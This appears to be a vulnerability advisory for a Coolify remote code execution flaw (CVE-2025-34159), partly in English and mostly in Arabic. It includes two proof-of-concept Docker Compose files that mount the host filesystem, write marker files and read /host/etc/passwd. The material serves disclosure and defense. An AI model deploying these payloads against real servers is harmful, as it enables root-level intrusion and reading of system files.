
A critical Remote Code Execution (RCE) vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem an attacker can achieve root-level command execution on
| الحقل | القيمة |
|---|---|
| معرف CVE | CVE-2025-34159 |
| يؤثر على | Coolify ≤ v4.0.0-beta.420.6 |
| تم الإصلاح في | v4.0.0-beta.420.7 |
| الخطورة | حرجة |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (حقن أوامر النظام), CWE-20 (التحقق غير السليم من المدخلات) |
توجد ثغرة أمنية حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) في سير عمل نشر التطبيقات في Coolify. تسمح هذه الثغرة لـ عضو ذي صلاحيات منخفضة بحقن توجيهات Docker Compose تعسفية أثناء إنشاء المشاريع أو تحديثها. من خلال تعريف خدمة خبيثة تقوم بتحميل نظام الملفات للمضيف، يمكن للمهاجم تحقيق تنفيذ أوامر على مستوى الجذر على نظام التشغيل المضيف، متجاوزًا بذلك عزل الحاويات تمامًا.
توجد الثغرة في سير عمل نشر المشروع حيث يتم معالجة تكوينات Docker Compose المقدمة من المستخدم دون التحقق الكافي أو وضعها في بيئة معزولة.
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /host/etc/passwd
"
النتيجة: بعد النشر، يظهر الملف /tmp/proof_rce.txt على النظام المضيف، مما يؤكد RCE بصلاحيات الجذر.
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt) أو مراجعة مخرجات الأوامر في سجلات النشر